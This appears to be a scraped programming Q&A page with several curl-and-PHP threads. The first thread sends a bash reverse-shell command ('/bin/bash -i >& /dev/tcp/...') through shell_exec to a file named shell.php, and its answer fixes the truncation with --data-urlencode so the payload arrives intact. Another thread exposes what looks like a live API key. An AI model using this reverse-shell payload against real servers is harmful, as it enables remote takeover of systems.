We Keep Coding

curl -d option truncate data with & symbol

I was testing by sending some data using curl -d and retrieve the data in a PHP script using $_POST['data'],
My request is like
curl https://localhost/shell.php -d "data=shell_exec(\"/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.0.1/8888 0>&1 ' \");"
And the shell.php script is like:
var_dump($_POST['data']);
However, the output is truncated, I am only able to get:
shell_exec(\"/bin/bash -c '/bin/bash -i >
from $_POST['data'].

Can you try and escape \&
Like curl https://localhost/shell.php -d "data=shell_exec("/bin/bash -c '/bin/bash -i >\& /dev/tcp/192.168.0.1/8888 0>&1 ' ");"
?

The Cause
After doing some research, i think i find the root cause of this problem.
First, we have to understand some basic workflow of PHP runtime. When a http request is sent to fast-cgi, the workflow looks like below:
Some preprocess(i didn't research too much in this step)
Post request processed vim a bunch module:
cgi_main
SAPI
Some other code
PHP String Process
We can also find that there is a page about PHP default configuration and we can figure out that & is the default arg separator for input parameter.
According to all the information we have so far, we can conclude PHP runtime will receive the post data sent by curl and parse it automatically and during the process it will split parameter string based on the default separator.
In my case, if i sent the post request with -d, the & was not encoded and thus the data will be truncated by PHP at the first occurrence of &, which cause the following command to be abandoned.
The Solution
Use --data-url-encode instead of -d
curl https://localhost/shell.php --data-urlencode "data=shell_exec(\"/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.0.1/8888 0>&1 ' \");"
Note
Some times we see something like PG, SG and EG. They are PHP common macros from:
PHP
ZEND
SAPI

how to assign the mosquitto_sub output to a variable using php exec?

in my publisher, I tried something like
$msg = '{"test":"a","test2":"b"}';
$publishCommand = "mosquitto_pub -h IP_ADDRESS_HERE -t TOPIC_HERE -m $msg";
exec($publishCommand);
that snippet above works.
because when I tried manually in the server this snippet below, i can see the json string output
mosquitto_sub -h 127.0.0.1 -t TOPIC_HERE -i 'ID_HERE'
however when I tried using that snippet above in PHP, in order for me to assign the output to a variable and be able to json_decode the data, it doesn't work at all, I cannot get the output with this snippet below
exec("mosquitto_sub -h 127.0.0.1 -t TOPIC_HERE -i 'ID_HERE'", $output);
print_r($output);
NOR with this one
exec("mosquitto_sub -h 127.0.0.1 -t TOPIC_HERE -i 'ID_HERE' 2>&1", $output);
print_r($output);
NOR with this one
exec("/usr/bin/mosquitto_sub -h 127.0.0.1 -t TOPIC_HERE -i 'ID_HERE'", $output);
print_r($output);
I also tried using the passthru OR system , but both of this are immediately displaying the output and I am not able to assign the output to a variable
even after using ob_* series of functions e.g ob_start, ob_get_contents and etc...

Your problem here is most likely because mosquitto_sub will never exit.
By default mosquitto_sub runs for ever printing out every message that it published to a matching topic. In order to get the output you need mosquitto_sub to return and close it's handle on stdout.
mosquitto_sub can be told how many messages to wait for before it exits with the -C option. From the man page:
-C
Disconnect and exit the program immediately after the given count of
messages have been received. This may be useful in shell scripts where
on a single status value is required, for example.
If you want to subscribe to MQTT topics from PHP I suggest you have look at a native PHP client. There is a list here

Not able to upload file using curl command with other json parameter in lumen php project api

I want to call my upload csv api using curl command but no able to upload file on that which gives me error.
Command I am using as follow:
curl -i -X POST -H "Content-Type:application/json" https://api.staging.mailzap.com/api/v1/api-key/upload-csv -d '{"apiKey":"Srkk8RL8xETAeJ0lTm85","email_csv":'#\"C:/Users/viral.champanery/Desktop/publicapi/test.txt\"',"team_id":282}'
following option also not working
curl -i -X POST -H "Content-Type:multipart/form-data;application/json;application/csv;" https://api.staging.mailzap.com/api/v1/api-key/upload-csv -d '{"apiKey":"Srkk8RL8xETAeJ0lTm85","email_csv":"C:/Users/viral.champanery/Desktop/publicapi/test.txt","team_id":282}'
also not working following
curl -i -X POST -H "Content-Type:multipart/form-data;application/json;application/csv;" https://api.staging.mailzap.com/api/v1/api-key/upload-csv -d '{"apiKey":"Srkk8RL8xETAeJ0lTm85","team_id":282}' -F "email_csv=#/C/Users/viral.champanery/Desktop/publicapi/test.csv"
email_csv=#/C/Users/viral.champanery/Desktop/publicapi/test.csv"
help me to upload file with json other parameter in api using curl command

how to response from php file to bash script?

I created a website on centos 6. I posted a request to the website (it has a php file) from a bash script with this command:
curl -X POST -d text="example" "website"
However, I can not return a response from the php file to the bash script. How can I do this?

You are making a HTTP POST request with CURL but you haven't told it to return anything.
Try this:
curl -v -X POST -d text="example" "website"
This is telling the CURL to verbosely dump everything about the response (header and body).
Here's the documentation for command line usage: http://curl.haxx.se/docs/manpage.html

How can I convert this cURL command to php code

I can't seem to find any reference to the LH command this cURL command uses -- so I'm not entirely certain how to translate it to php
$ curl -LH "Accept: text/bibliography; style=mla; locale=fr-FR" http://dx.doi.org/10.1038/nrd842

curl -LH is just two flags L and H.
See: http://curl.haxx.se/docs/manpage.html
-L = Location
-H = Header
In your code, you should either swap your flags to -HL or swap your argument values.